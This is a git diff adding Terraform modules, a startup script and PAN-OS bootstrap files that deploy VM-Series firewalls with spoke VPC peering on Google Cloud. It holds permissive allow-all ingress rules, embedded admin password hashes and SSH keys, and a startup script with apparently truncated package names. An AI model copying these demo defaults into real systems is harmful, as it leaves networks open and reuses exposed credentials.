+ subnetwork = "${var.vm_subnetworks[0]}"
+ backend_service = "${google_compute_region_backend_service.backend_service.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf
new file mode 100644
index 00000000..8a87285a
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf
@@ -0,0 +1,176 @@
+variable fw_subnetworks {
+ type = "list"
+}
+
+variable fw_names {
+ type = "list"
+}
+
+variable fw_machine_type {}
+
+variable fw_zones {
+ type = "list"
+}
+
+variable fw_cpu_platform {
+ default = "Intel Skylake"
+}
+
+variable fw_bootstrap_bucket {
+ default = ""
+}
+
+variable fw_ssh_key {}
+
+variable public_lb_create {
+ default = false
+}
+
+variable fw_scopes {
+ type = "list"
+
+ default = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+variable fw_image {}
+
+variable fw_tags {
+ type = "list"
+ default = []
+}
+
+variable create_instance_group {
+ default = false
+}
+
+variable instance_group_names {
+ type = "list"
+ default = ["vmseries-instance-group"]
+}
+
+variable "dependencies" {
+ type = "list"
+ default = []
+}
+
+variable fw_nic0_ip {
+ type = "list"
+ default = []
+}
+
+variable fw_nic1_ip {
+ type = "list"
+ default = []
+}
+
+variable fw_nic2_ip {
+ type = "list"
+ default = []
+}
+
+resource "null_resource" "dependency_getter" {
+ provisioner "local-exec" {
+ command = "echo ${length(var.dependencies)}"
+ }
+}
+
+#************************************************************************************
+# CREATE VMSERIES
+#***********************************************************************************
+resource "google_compute_instance" "vmseries" {
+ count = "${length(var.fw_names)}"
+ name = "${element(var.fw_names, count.index)}"
+ machine_type = "${var.fw_machine_type}"
+ zone = "${element(var.fw_zones, count.index)}"
+ min_cpu_platform = "${var.fw_cpu_platform}"
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ tags = "${var.fw_tags}"
+
+ metadata {
+ vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}"
+ serial-port-enable = true
+ sshKeys = "${var.fw_ssh_key}"
+ }
+
+ service_account {
+ scopes = "${var.fw_scopes}"
+ }
+
+ network_interface {
+ subnetwork = "${var.fw_subnetworks[0]}"
+ access_config = {}
+ network_ip = "${element(var.fw_nic0_ip, count.index)}"
+ }
+
+ network_interface {
+ subnetwork = "${var.fw_subnetworks[1]}"
+ access_config = {}
+ network_ip = "${element(var.fw_nic1_ip, count.index)}"
+ }
+
+ network_interface {
+ subnetwork = "${var.fw_subnetworks[2]}"
+ network_ip = "${element(var.fw_nic2_ip, count.index)}"
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.fw_image}"
+ }
+ }
+
+ depends_on = [
+ "null_resource.dependency_getter",
+ ]
+}
+
+#************************************************************************************
+# CREATE INSTANCE GROUP
+#************************************************************************************
+resource "google_compute_instance_group" "vmseries" {
+ count = "${(var.create_instance_group) ? length(var.fw_names) : 0}"
+ name = "${element(var.instance_group_names, count.index)}"
+ zone = "${element(var.fw_zones, count.index)}"
+ instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"]
+
+ named_port {
+ name = "http"
+ port = "80"
+ }
+}
+
+
+
+
+
+
+#************************************************************************************
+# OUTPUTS
+#************************************************************************************
+
+output "fw_names" {
+ value = "${google_compute_instance.vmseries.*.name}"
+}
+
+output "fw_self_link" {
+ value = "${google_compute_instance.vmseries.*.self_link}"
+}
+
+output "instance_group" {
+ value = "${google_compute_instance_group.vmseries.*.self_link}"
+}
+
+
+output "fw_nic0_public_ip" {
+ value = "${google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip}"
+}
+
+output "fw_nic1_public_ip" {
+ value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}"
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf
new file mode 100644
index 00000000..e4511595
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf
@@ -0,0 +1,71 @@
+variable vpc_name {}
+
+variable subnetworks {
+ type = "list"
+}
+
+variable ip_cidrs {
+ type = "list"
+}
+
+variable regions {
+ type = "list"
+}
+
+variable ingress_allow_all {
+ default = true
+}
+
+variable ingress_sources {
+ type = "list"
+ default = ["0.0.0.0/0"]
+}
+
+resource "google_compute_network" "default" {
+ name = "${var.vpc_name}"
+ auto_create_subnetworks = false
+}
+
+resource "google_compute_subnetwork" "default" {
+ count = "${length(var.subnetworks)}"
+ name = "${element(var.subnetworks, count.index)}"
+ ip_cidr_range = "${element(var.ip_cidrs, count.index)}"
+ region = "${element(var.regions, count.index)}"
+ network = "${google_compute_network.default.self_link}"
+}
+
+resource "google_compute_firewall" "ingress_all" {
+ count = "${var.ingress_allow_all}"
+ name = "${google_compute_network.default.name}-ingress-all"
+ network = "${google_compute_network.default.self_link}"
+ direction = "INGRESS"
+ source_ranges = "${var.ingress_sources}"
+
+ allow {
+ protocol = "all"
+ }
+}
+
+output "subnetwork_id" {
+ value = "${google_compute_subnetwork.default.*.id}"
+}
+
+output "subnetwork_name" {
+ value = "${google_compute_subnetwork.default.*.name}"
+}
+
+output "subnetwork_self_link" {
+ value = "${google_compute_subnetwork.default.*.self_link}"
+}
+
+output "vpc_name" {
+ value = "${google_compute_network.default.*.name}"
+}
+
+output "vpc_id" {
+ value = "${google_compute_network.default.*.id[0]}"
+}
+
+output "vpc_self_link" {
+ value = "${google_compute_network.default.*.self_link[0]}"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/outputs.tf b/gcp/adv_peering_2fw_2spoke/outputs.tf
new file mode 100644
index 00000000..dec2a032
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/outputs.tf
@@ -0,0 +1,37 @@
+#************************************************************************************
+# OUTPUTS
+#************************************************************************************
+output " IMPORTANT!! PLEASE READ!! " {
+ value = [
+ "===================================================================================",
+ "Before proceeding, you must enable import/export custom routes on all peering links",
+ "and remove the default (0.0.0.0/0) route from TRUST, SPOKE1, and SPOKE2 VPCs",
+ "==================================================================================="]
+}
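+
+# A hedged sketch of the manual follow-up the message above asks for. Peering,
+# network, and route names below are illustrative; substitute the names this
+# deployment actually created (older Cloud SDK releases may need the
+# "gcloud beta" track for the custom-routes flags).
+#   gcloud compute networks peerings update spoke1-to-trust --network=spoke1-vpc \
+#     --export-custom-routes --import-custom-routes
+#   gcloud compute networks peerings update trust-to-spoke1 --network=trust-vpc \
+#     --export-custom-routes --import-custom-routes
+#   gcloud compute routes list --filter="destRange=0.0.0.0/0"
+#   gcloud compute routes delete <auto-created-default-route-name>
+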
+output "GLB-ADDRESS " {
+ value = "http://${module.vmseries_public_lb.address}"
+}
+
+output "MGMT-URL-FW1 " {
+ value = "https://${module.vm_fw.fw_nic1_public_ip[0]}"
+}
+
+output "MGMT-URL-FW2 " {
+ value = "https://${module.vm_fw.fw_nic1_public_ip[1]}"
+}
+
+output "SSH-SPOKE1-FW1" {
+ value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 221 -i "
+}
+
+output "SSH-SPOKE2-FW1" {
+ value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 222 -i "
+}
+
+output "SSH-SPOKE1-FW2" {
+ value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 221 -i "
+}
+
+output "SSH-SPOKE2-FW2" {
+ value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 222 -i "
+}
diff --git a/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php b/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php
@@ -0,0 +1,62 @@
+
+ SOURCE & DESTINATION ADDRESSES
+ ';
+echo ''. "INTERVAL" .': '. $time .' ';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo ''. "SOURCE IP" .': '. $sourceIPAddress .' ';
+echo ''. "LOCAL IP" .': '. $localIPAddress .' ';
+
+$vm_name = gethostname();
+echo ''. "VM NAME" .': '. $vm_name .' ';
+echo ''. ' ';
+echo '
+ HEADER INFORMATION
+ ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+ if (substr($header, 0, 5) == 'HTTP_') {
+ /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+ $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+ /* Replace underscores by the dashes, as the browser sends them */
+ $clean_header = str_replace('_', '-', $clean_header);
+
+ /* Cleanup: standard headers are first-letter uppercase */
+ $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+ /* And show'm */
+ echo ''. $header .': '. $value .' ';
+ }
+}
+?>
diff --git a/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh b/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh
new file mode 100644
index 00000000..1349754f
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh
@@ -0,0 +1,7 @@
+#!/bin/bash
+until sudo apt-get update; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y apache2 php7. libapache2-mod-php7.; do echo "Retrying"; sleep 2; done
+until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
+until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
+until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
diff --git a/gcp/adv_peering_2fw_2spoke/spoke1.tf b/gcp/adv_peering_2fw_2spoke/spoke1.tf
new file mode 100644
index 00000000..fbbe81ec
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/spoke1.tf
@@ -0,0 +1,61 @@
+provider "google" {
+ credentials = "${var.spoke1_project_authfile}"
+ project = "${var.spoke1_project}"
+ region = "${var.region}"
+ alias = "spoke1"
+}
+
+#************************************************************************************
+# CREATE SPOKE1 VPC & SPOKE1 VMs (w/ INTLB)
+#************************************************************************************
+module "vpc_spoke1" {
+ source = "./modules/create_vpc/"
+ vpc_name = "spoke1-vpc"
+ subnetworks = ["spoke1-subnet"]
+ ip_cidrs = ["10.10.1.0/24"]
+ regions = ["${var.region}"]
+ ingress_allow_all = true
+ ingress_sources = ["0.0.0.0/0"]
+
+ providers = {
+ google = "google.spoke1"
+ }
+}
+
+module "vm_spoke1" {
+ source = "./modules/create_vm/"
+ vm_names = ["spoke1-vm1", "spoke1-vm2"]
+ vm_zones = ["${var.region}-a", "${var.region}-a"]
+ vm_machine_type = "f1-micro"
+ vm_image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ vm_subnetworks = ["${module.vpc_spoke1.subnetwork_self_link[0]}", "${module.vpc_spoke1.subnetwork_self_link[0]}"]
+ vm_ssh_key = "ubuntu:${var.ubuntu_ssh_key}"
+ startup_script = "${file("${path.module}/scripts/webserver-startup.sh")}" // default "" - runs no startup script
+
+ internal_lb_create = true // default false
+ internal_lb_name = "spoke1-intlb" // default "intlb"
+ internal_lb_ports = ["80", "443"] // default ["80"]
+ internal_lb_ip = "10.10.1.100" // default "" (assigns any available IP in the subnetwork)
+
+ providers = {
+ google = "google.spoke1"
+ }
+}
+
+#************************************************************************************
+# CREATE PEERING LINK SPOKE1-to-TRUST
+#************************************************************************************
+resource "google_compute_network_peering" "spoke1_to_trust" {
+ name = "spoke1-to-trust"
+ network = "${module.vpc_spoke1.vpc_self_link}"
+ peer_network = "${module.vpc_trust.vpc_self_link}"
+
+ provisioner "local-exec" {
+ command = "sleep 45"
+ }
+
+ depends_on = [
+ "google_compute_network_peering.trust_to_spoke2",
+ ]
+ provider = "google.spoke1"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/spoke2.tf b/gcp/adv_peering_2fw_2spoke/spoke2.tf
new file mode 100644
index 00000000..718ff170
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/spoke2.tf
@@ -0,0 +1,55 @@
+provider "google" {
+ credentials = "${var.spoke2_project_authfile}"
+ project = "${var.spoke2_project}"
+ region = "${var.region}"
+ alias = "spoke2"
+}
+
+#************************************************************************************
+# CREATE SPOKE2 VPC & SPOKE2 VM
+#************************************************************************************
+module "vpc_spoke2" {
+ source = "./modules/create_vpc/"
+ vpc_name = "spoke2-vpc"
+ subnetworks = ["spoke2-subnet"]
+ ip_cidrs = ["10.10.2.0/24"]
+ regions = ["${var.region}"]
+ ingress_allow_all = true
+ ingress_sources = ["0.0.0.0/0"]
+
+ providers = {
+ google = "google.spoke2"
+ }
+}
+
+module "vm_spoke2" {
+ source = "./modules/create_vm/"
+ vm_names = ["spoke2-vm1"]
+ vm_zones = ["${var.region}-a"]
+ vm_machine_type = "f1-micro"
+ vm_image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ vm_subnetworks = ["${module.vpc_spoke2.subnetwork_self_link[0]}"]
+ vm_ssh_key = "ubuntu:${var.ubuntu_ssh_key}"
+
+ providers = {
+ google = "google.spoke2"
+ }
+}
+
+#************************************************************************************
+# CREATE PEERING LINK SPOKE2-to-TRUST
+#************************************************************************************
+resource "google_compute_network_peering" "spoke2_to_trust" {
+ name = "spoke2-to-trust"
+ network = "${module.vpc_spoke2.vpc_self_link}"
+ peer_network = "${module.vpc_trust.vpc_self_link}"
+
+ provisioner "local-exec" {
+ command = "sleep 45"
+ }
+
+ depends_on = [
+ "google_compute_network_peering.spoke1_to_trust",
+ ]
+ provider = "google.spoke2"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/variables.tf b/gcp/adv_peering_2fw_2spoke/variables.tf
new file mode 100644
index 00000000..f273131f
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/variables.tf
@@ -0,0 +1,65 @@
+#************************************************************************************
+# GCP VARIABLES
+#************************************************************************************
+variable "region" {
+ default = "us-east4"
+}
+
+#************************************************************************************
+# main.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "main_project" {
+ description = "Existing project ID for main project (all resources deployed in main.tf)"
+ default = "host-project-242119"
+}
+
+variable "main_project_authfile" {
+ description = "Authentication file for main project (all resources deployed in main.tf)"
+ default = "host-project-b533f464016c.json"
+}
+
+#************************************************************************************
+# spoke1.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "spoke1_project" {
+ description = "Existing project for spoke1 (can be the same as main project and can be same as main project)."
+ default = "host-project-242119"
+}
+
+variable "spoke1_project_authfile" {
+ description = "Authentication file for spoke1 project (all resources deployed in spoke1.tf)"
+ default = "host-project-b533f464016c.json"
+}
+
+#************************************************************************************
+# spoke2.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "spoke2_project" {
+ description = "Existing project for spoke2 (can be the same as main project and can be same as main project)."
+ default = "host-project-242119"
+}
+
+variable "spoke2_project_authfile" {
+ description = "Authentication file for spoke2 project (all resources deployed in spoke2.tf and can be same as main project)"
+ default = "host-project-b533f464016c.json"
+}
+
+#************************************************************************************
+# VMSERIES SSH KEY & IMAGE (not required if bootstrapping)
+#************************************************************************************
+variable "vmseries_ssh_key" {
+ default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDa7UUo1v42jebXVHlBof9E9GAFfalTndZQmvlmFu9e88euqrLI4xEZwg9ihwPFVTXOmrAogye6ojv5rbf3f13ZFYB+USjcR/9RFX+DKkPmXluC5Xq3z0ZlxY3QETHSlr6G8pfEqNwFebYJmKZ1MVNUztmb1DTIhjbFN4IAK/8NzQTbOYnEbXV4BB9E9Xe7dtuDuQrgaoII7KITnYdY4tjI10/K01Ay52PC7eISvZBRZntto2Mg1WjWQAwyIJHFC8nXoE04Wbzv91ohLfs/Og/dSOhdFymX1KVx5XSZWZ0POEOFY3rsDHFDrMiZIxipfuvBtEsznExp7ybkIDtWOxNX admin"
+}
+
+#************************************************************************************
+# UBUNTU SSH KEY
+#************************************************************************************
+variable "ubuntu_ssh_key" {
+ default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDk7y0D0Rz4F5J9Lu7gtTRTaEkJdWNLpmnDXcvHvaNC3euQ0KITIU6XaPHlXiB1M8pCrmBw3CFkFLxnPoGHrcN39wi2BR9d6Y1piz1v0gJqbggdMloSnrz51OVPqqC5BjtN/lB9hTcyNrh4MDfv37sRChHJb31s934vbj+qeiR16ZeLHH5moRXnyuzIvVUePnXHZvYz0M+YxJtvf806cz+Dvio72Y5g69/DUWReTNZ3h51MKseYMJT0Uu7mPJUZlH+xURc8zzzFazTE1jD7qL2z497si7oVHzmHm5nCECNayore3jzp5YYQkzEfe2fujxeM4UGlEBYuMkUxlH8QV5qN ubuntu"
+}
+
+variable "vmseries_image" {
+ # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-814"
+ default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814"
+ # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814"
+}
diff --git a/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf b/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf
new file mode 100644
index 00000000..ef6db3f1
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf differ
diff --git a/gcp/adv_peering_2fw_2spoke_common/README.md b/gcp/adv_peering_2fw_2spoke_common/README.md
new file mode 100644
index 00000000..0ac8b6bc
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/README.md
@@ -0,0 +1,59 @@
+# 2 x VM-Series / Public LB / Internal LB / 2 x Spoke VPCs
+
+Terraform creates 2 VM-Series firewalls that secure ingress/egress traffic from spoke VPCs. The spoke VPCs are connected (via VPC Peering) to the VM-Series trust VPC. All TCP/UDP traffic originating from the spokes is routed to internal load balancers in the trust VPC.
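+
+A minimal sketch of the routing pattern behind that statement (the resource and
+network names here are illustrative, not this build's actual identifiers): the
+trust VPC carries a default route whose next hop is the internal load balancer
+in front of the firewalls, and enabling custom-route export on the peering
+links propagates that route to the spoke VPCs.
+
+```
+resource "google_compute_route" "default_via_fw_ilb" {
+  provider     = google-beta             # next_hop_ilb required the google-beta provider at the time
+  name         = "trust-default-via-ilb"
+  network      = "trust-vpc"                                      # illustrative network name
+  dest_range   = "0.0.0.0/0"
+  next_hop_ilb = google_compute_forwarding_rule.fw_ilb.self_link  # illustrative forwarding rule
+  priority     = 100
+}
+```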
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf) for more information.
+
+
+
+
+
+
+
+## Prerequisites
+* Valid GCP Account with an existing project
+* Access to Google Cloud Shell or a machine with Terraform 0.12 installed
+
+
+
+## How to Deploy
+### 1. Setup & Download Build
+In your project, open Google Cloud Shell and run the following.
+```
+$ gcloud services enable compute.googleapis.com
+$ ssh-keygen -f ~/.ssh/gcp-demo -t rsa -C gcp-demo
+$ git clone https://github.com/wwce/terraform; cd terraform/gcp/adv_peering_2fw_2spoke_common
+```
+
+### 2. Edit terraform.tfvars
+Open terraform.tfvars and edit variables (lines 1-4) to match your Project ID, SSH Key (from step 1), and VM-Series type.
+
+```
+$ vi terraform.tfvars
+```
+
+
+Your terraform.tfvars should look similar to the example below before proceeding.
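+
+The example is a sketch only; the variable names are assumptions borrowed from
+the adv_peering_4fw_2spoke build in this repo, so match them to what actually
+appears on lines 1-4 of this directory's terraform.tfvars.
+
+```
+project_id      = "my-gcp-project"        # existing GCP project ID
+public_key_path = "~/.ssh/gcp-demo.pub"   # public key generated in step 1
+fw_image        = "vmseries-bundle1"      # VM-Series license type (assumed value)
+fw_panos        = "814"                   # PAN-OS version (assumed value)
+```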
+
+
+
+
+### Prerequisites
+1. Valid GCP Account
+
+### How To
+Set up the project (all commands are run from Google Cloud Shell or from a local machine with Terraform v0.12 installed)
+```
+ $ gcloud services enable compute.googleapis.com
+ $ ssh-keygen -f ~/.ssh/ -t rsa -C
+ $ git clone https://github.com/wwce/terraform; cd terraform/gcp/adv_peering_4fw_2spoke
+```
+
+Run Build
+```
+ # Edit terraform.tfvars to match project ID, SSH Key, and PAN-OS version and license.
+
+ $ terraform init
+ $ terraform apply
+```
+
+Destroy Build
+```
+ $ terraform destroy
+```
+
+## Support Policy
+The guide in this directory and the accompanying files are released under an as-is, best-effort support policy. These scripts should be seen as community supported, and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, ASC (Authorized Support Centers) partners, and backline support options. The underlying product used by the scripts or templates (the VM-Series firewall) is still supported, but the support covers only the product functionality and not help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml
new file mode 100644
index 00000000..e7e275ee
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml
@@ -0,0 +1,898 @@
+
+
+
+
+
+
+
+ yes
+
+
+ $1$omtpasik$JVuMCKVuxaIHBIkdrbR4k.
+
+
+
+
+ yes
+
+
+ $1$kpolrmjb$lJ5t7tCjS7Ghd8tachjOJ.
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ yes
+
+ 1460
+
+ no
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ yes
+
+ 1460
+
+ no
+
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+
+
+ 192.168.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ 0.0.0.0/0
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/2
+ 10
+ 10.10.1.0/24
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/2
+ 10
+ 10.10.2.0/24
+
+
+
+
+
+
+
+
+
+
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ download-and-install
+ 15
+
+
+
+
+
+
+ download-and-install
+ 30
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+ vm-series
+
+
+ 208.67.222.222
+ 208.67.220.220
+
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ yes
+
+ no
+
+
+
+
+ yes
+
+
+ FQDN
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ 8.8.8.8
+ 4.2.2.2
+ mgmt-interface-swap
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+
+
+
+
+ 22
+
+
+
+
+
+
+ 221
+
+
+
+
+
+
+ 222
+
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ ping
+
+
+ application-default
+
+
+ any
+
+ yes
+ yes
+ allow
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ yes
+ yes
+ allow
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ ssh
+
+
+ tcp-221
+ tcp-222
+
+
+ any
+
+ yes
+ yes
+ allow
+ no
+ If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222.
+
+
+
+
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ untrust
+
+
+ untrust
+
+
+
+ any
+
+ service-http
+ ipv4
+ no
+
+ spoke1-intlb
+ 80
+
+ ethernet1/1
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ untrust
+
+
+ untrust
+
+
+
+ any
+
+ tcp-221
+ ipv4
+
+ spoke1-vm
+ 22
+
+ ethernet1/1
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ untrust
+
+
+ untrust
+
+
+
+ any
+
+ tcp-222
+ ipv4
+
+ spoke2-vm
+ 22
+
+ ethernet1/1
+
+
+
+
+
+
+ deny
+ no
+ yes
+
+
+ deny
+ no
+ yes
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ critical
+
+ any
+ client
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ high
+
+ any
+ client
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ medium
+
+ any
+ client
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ critical
+
+ any
+ server
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ high
+
+ any
+ server
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ medium
+
+ any
+ server
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+
+ WW's profile
+
+
+
+
+
+ 10.10.2.2
+
+ spoke2-vpc
+
+
+
+ 10.10.1.2
+
+ spoke1-vpc
+
+
+
+ 10.10.1.0/24
+
+ spoke1-vpc
+
+
+
+ 10.10.2.0/24
+
+ spoke2-vpc
+
+
+
+ 10.10.1.100
+
+ spoke1-vpc
+
+
+
+
+
+
+ ethernet1/1
+ ethernet1/2
+
+
+
+
+
+ color3
+
+
+ color24
+
+
+ color20
+
+
+ color13
+
+
+
+
+
+
+
+
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt
new file mode 100644
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes
new file mode 100755
